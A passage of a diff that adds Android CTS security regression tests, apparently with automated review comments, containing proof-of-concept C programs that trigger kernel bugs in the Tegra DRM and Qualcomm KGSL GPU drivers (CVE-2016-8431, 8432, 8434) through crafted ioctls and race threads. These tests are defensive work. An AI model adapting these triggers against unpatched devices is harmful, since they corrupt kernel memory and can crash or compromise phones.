+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
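Review bot: `local_poc.h` uses `__u32`/`__u64` and the `_IOW`/`_IOWR` macros without including anything itself, so it compiles only when the including file has already pulled in `<sys/ioctl.h>`; adding `#include <linux/types.h>` and `#include <sys/ioctl.h>` right after the guard makes it self-contained. The wireless-extension constants at the top (`SIOCIWFIRSTPRIV` through `PRIV_CMD_WSC_PROBE_REQ`) and the copies of kernel-internal layouts (`struct kobject`, `struct device`, `struct host1x`, `struct tegra_drm_client` with its `pad[232]`) are not referenced by the poc.c added beside it. Those layouts are not ABI, so either drop them or add a comment such as `/* kernel-internal layout, copied from <kernel version>; not a stable interface */`. The header added for CVE-2016-8432 is the same blob (`c74db80`), so the same applies there.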
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
new file mode 100644
index 0000000..1cc0f29
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 1
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+
+struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+ gem_create.size = PAGE_SIZE;
+ return 0;
+}
+
+int main()
+{
+ int ret;
+ int i;
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].cmdbuf.offset = 8192;
+ relocs[i].target.handle = gem_create.handle;
+ relocs[i].target.offset = 8192;
+ }
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }else{
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
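Review bot: In `prepare()`, `(__u64)&syncpt`, `(__u64)cmdbufs` and `(__u64)relocs` convert a pointer directly to a 64-bit integer, and this module is also built 32-bit (`LOCAL_MULTILIB := both`), where that is a cast between different widths whose extension is implementation-defined (GCC documents sign extension). Going through `uintptr_t` keeps the upper half zero on both ABIs: `submit_c.syncpts = (__u64)(uintptr_t)&syncpt;`, likewise for the other two, with `<stdint.h>` included. Separately, `ERR` expands to `strerror` without `<string.h>`, and `main` returns 0 both when `open(DEV, O_RDONLY)` fails and after the submit, so the exit status alone cannot tell a skipped run from a completed one. The same three casts appear in `prepare()` of the CVE-2016-8432 poc.c.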
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
new file mode 100644
index 0000000..614d20b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8432
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
new file mode 100644
index 0000000..52b48f2
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 100
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+volatile struct drm_gem_close gem_close;
+
+volatile struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+volatile struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static int prepare()
+{
+ int i;
+
+ open_c.client = HOST1X_CLASS_VIC;
+
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+
+ gem_close.handle = 1;
+
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = 0;
+ relocs[i].cmdbuf.handle = 0;
+ relocs[i].cmdbuf.offset = 0;
+ relocs[i].target.handle = 0;
+ relocs[i].target.offset = 0;
+ }
+
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+
+ gem_create.size = PAGE_SIZE;
+
+ return 0;
+}
+
+#define SUBMIT_THREAD_NUM 1
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+static void* submit_thread(void *no_use)
+{
+ set_affinity(1);
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ return NULL;
+}
+
+int main()
+{
+ int ret;
+ int i;
+ __u64 try_time;
+
+ set_affinity(0);
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ try_time = 1;
+ while(1){
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].target.handle = gem_create.handle;
+ }
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ }
+ usleep(150);
+ while(ioctl(dev_fd, DRM_IOCTL_GEM_CLOSE, &gem_close) == 0);
+ }
+ try_time++;
+ }
+
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_join(submit_thread_id[i], NULL);
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
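Review bot: The `while(1)` loop in `main` has no exit, so the `pthread_join` loop and the `out_dev:` cleanup after it are unreachable on the normal path and the program ends only when something outside kills it; `try_time` is incremented but never compared against anything. Each successful iteration also overwrites `submit_thread_id[i]` with a new thread that is never joined or detached, and the `pthread_create` return value is ignored, so thread resources accumulate until creation starts failing silently. Bounding the loop, e.g. `for (try_time = 1; try_time <= MAX_TRIES; try_time++)` with `MAX_TRIES` a constant you define, and moving the `pthread_join` into the loop body after the `DRM_IOCTL_GEM_CLOSE` loop gives the test a deterministic end and releases each thread. The empty `if(ret == -1){ }` in `set_affinity` should log the failure or be removed.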
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
new file mode 100644
index 0000000..6b20fe4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8434
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
new file mode 100644
index 0000000..de88a3b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
@@ -0,0 +1,171 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define KGSL_CONTEXT_SAVE_GMEM 0x00000001
+#define KGSL_CONTEXT_NO_GMEM_ALLOC 0x00000002
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SUBMIT_IB_LIST 0x00000004
+#define KGSL_CONTEXT_CTX_SWITCH 0x00000008
+#define KGSL_CONTEXT_PREAMBLE 0x00000010
+#define KGSL_CONTEXT_TRASH_STATE 0x00000020
+#define KGSL_CONTEXT_PER_CONTEXT_TS 0x00000040
+#define KGSL_CONTEXT_USER_GENERATED_TS 0x00000080
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_END_OF_FRAME 0x00000100
+#define KGSL_CONTEXT_NO_FAULT_TOLERANCE 0x00000200
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SYNC 0x00000400
+#define KGSL_CONTEXT_PWR_CONSTRAINT 0x00000800
+
+#define KGSL_IOC_TYPE 0x09
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id; /*output param */
+};
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+ unsigned int drawctxt_id;
+};
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+ _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+struct kgsl_timestamp_event {
+ int type; /* Type of event (see list below) */
+ unsigned int timestamp; /* Timestamp to trigger event on */
+ unsigned int context_id; /* Context for the timestamp */
+ void __user *priv; /* Pointer to the event specific blob */
+ size_t len; /* Size of the event specific blob */
+};
+#define IOCTL_KGSL_TIMESTAMP_EVENT \
+ _IOWR(KGSL_IOC_TYPE, 0x33, struct kgsl_timestamp_event)
+int g_fd = -1;
+int g_ctx_id = -1;
+int g_sync_fence_fd = -1;
+struct kgsl_timestamp_event g_event;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+void trigger_kgsl_create_drawctx() {
+ struct kgsl_drawctxt_create ctx;
+ ctx.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx);
+ printf("[*] IOCTL_KGSL_DRAWCTXT_CREATE id(%d), errno = %d\n", ctx.drawctxt_id, errno);
+ g_ctx_id = ctx.drawctxt_id;
+}
+
+void trigger_kgsl_free_drawctx(int id) {
+ struct kgsl_drawctxt_destroy ctx;
+ ctx.drawctxt_id = id;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &ctx);
+ //printf("[*] IOCTL_KGSL_DRAWCTXT_DESTROY, errno = %d\n", errno);
+}
+
+void trigger_kgsl_timestamp_event() {
+
+
+ //mprotect(event.priv, 0x1000, PROT_READ);
+
+ ioctl(g_fd, IOCTL_KGSL_TIMESTAMP_EVENT, &g_event);
+ printf("[*] IOCTL_KGSL_TIMESTAMP_EVENT fd(%d), errno = %d\n", *(int*)g_event.priv, errno);
+}
+
+int open_driver() {
+ char* dev_path = "/dev/kgsl-3d0";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ close(4);
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(-19, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ trigger_kgsl_create_drawctx();
+
+ g_event.type = 2;
+ g_event.context_id = g_ctx_id;
+ g_event.len = 4;
+ g_event.priv = malloc(0x1000);
+ g_event.timestamp = 0;
+ mprotect(g_event.priv, 0x1000, PROT_READ);
+ //printf("[*] close fd errno = %d\n", errno);
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_kgsl_timestamp_event();
+ }
+
+ return 0;
+}
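Review bot: `trigger_kgsl_create_drawctx` ignores the result of `ioctl()`, so when the call fails `ctx.drawctxt_id` is still uninitialised stack data at the point it is printed and copied into `g_ctx_id`, and the `errno` in the log line may be left over from an earlier call. Test the return value before using the output, e.g. `if (ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx) < 0) { perror("IOCTL_KGSL_DRAWCTXT_CREATE"); return; }`. The same applies to the unchecked `malloc`/`mprotect` pair in `main`, whose buffer is later dereferenced in `trigger_kgsl_timestamp_event`. Both `while (1)` loops have no exit, which leaves `return 0` unreachable and means the binary stops only when the harness kills it; a short comment at the top of `main` saying so would document the pass/fail contract.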
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
new file mode 100644
index 0000000..62efb65
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
